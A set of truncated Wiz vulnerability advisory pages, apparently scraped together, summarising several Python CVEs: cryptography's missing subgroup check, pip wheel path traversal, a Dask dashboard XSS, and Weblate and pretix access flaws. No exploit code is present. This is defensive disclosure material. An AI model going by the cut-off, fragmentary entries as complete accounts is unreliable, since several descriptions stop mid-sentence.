File hash/signature
File ownership/permissions
.so
## Recommended Fix
Verify the module's integrity (hash or signature) befo
Wiz
CVE-2026-26007 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-26007 [HIGH] CVE-2026-26007 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26007 :
Python vulnerability analysis and mitigation
cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to 46.0.5, the public_key_from_numbers (or EllipticCurvePublicNumbers.public_key()), EllipticCurvePublicNumbers.public_key(), load_der_public_key() and load_pem_public_key() functions do not verify that the point belongs to the expected prime-order subgroup of the curve. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks i
Wiz
CVE-2025-67715 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2025-67715 [MEDIUM] CVE-2025-67715 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67715 :
Python vulnerability analysis and mitigation
Weblate is a web based localization tool. In versions prior to 5.15, it was possible to retrieve user notification settings or list all users via API. Version 5.15 fixes the issue.
Source : NVD
## 4.3
Score
Published December 16, 2025
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
weblate
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Dec 16, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's list
Wiz
CVE-2026-1703 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.0
CVE-2026-1703 [LOW] CVE-2026-1703 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1703 :
Python vulnerability analysis and mitigation
When pip is installing and extracting a maliciously crafted wheel archive, files may be extracted outside the installation directory. The path traversal is limited to prefixes of the installation directory, thus isn't able to inject or overwrite executable files in typical situations.
Source : NVD
## 2
Score
Published February 2, 2026
Severity LOW
CNA Score 2.0
Affected Technologies
Python
CBL Mariner
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
rhel9/python-311
ubi9/python-39
Sources
NVD
CBL-Mariner 3.0 Severity LOW Has Fix Added at: Mar 13
Wiz
CVE-2026-23528 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23528 [MEDIUM] CVE-2026-23528 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23528 :
Python vulnerability analysis and mitigation
Dask distributed is a distributed task scheduler for Dask. Prior to 2026.1.0, when Jupyter Lab, jupyter-server-proxy, and Dask distributed are all run together, it is possible to craft a URL which will result in code being executed by Jupyter due to a cross-side-scripting (XSS) bug in the Dask dashboard. It is possible for attackers to craft a phishing URL that assumes Jupyter Lab and Dask may be running on localhost and using default ports. If a user clicks on the malicious link it will open an error page in the Dask Dashboard via the Jupyter Lab proxy which will cause code to be executed by the default Jupyter Python kernel. This vulnerability is fixed in 2026.1.0.
Source : NVD
## 5.3
Score
Published January 16, 202
Wiz
CVE-2025-14882 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.8
CVE-2025-14882 [LOW] CVE-2025-14882 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14882 :
Python vulnerability analysis and mitigation
An API endpoint allowed access to sensitive files from other users by knowing the UUID of the file that were not intended to be accessible by UUID only.
Source : NVD
## 3.8
Score
Published December 19, 2025
Severity LOW
CNA Score 3.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pretix
Sources
NVD
pip Severity LOW Has Fix Added at: Dec 22, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilit
2026-04-07
Published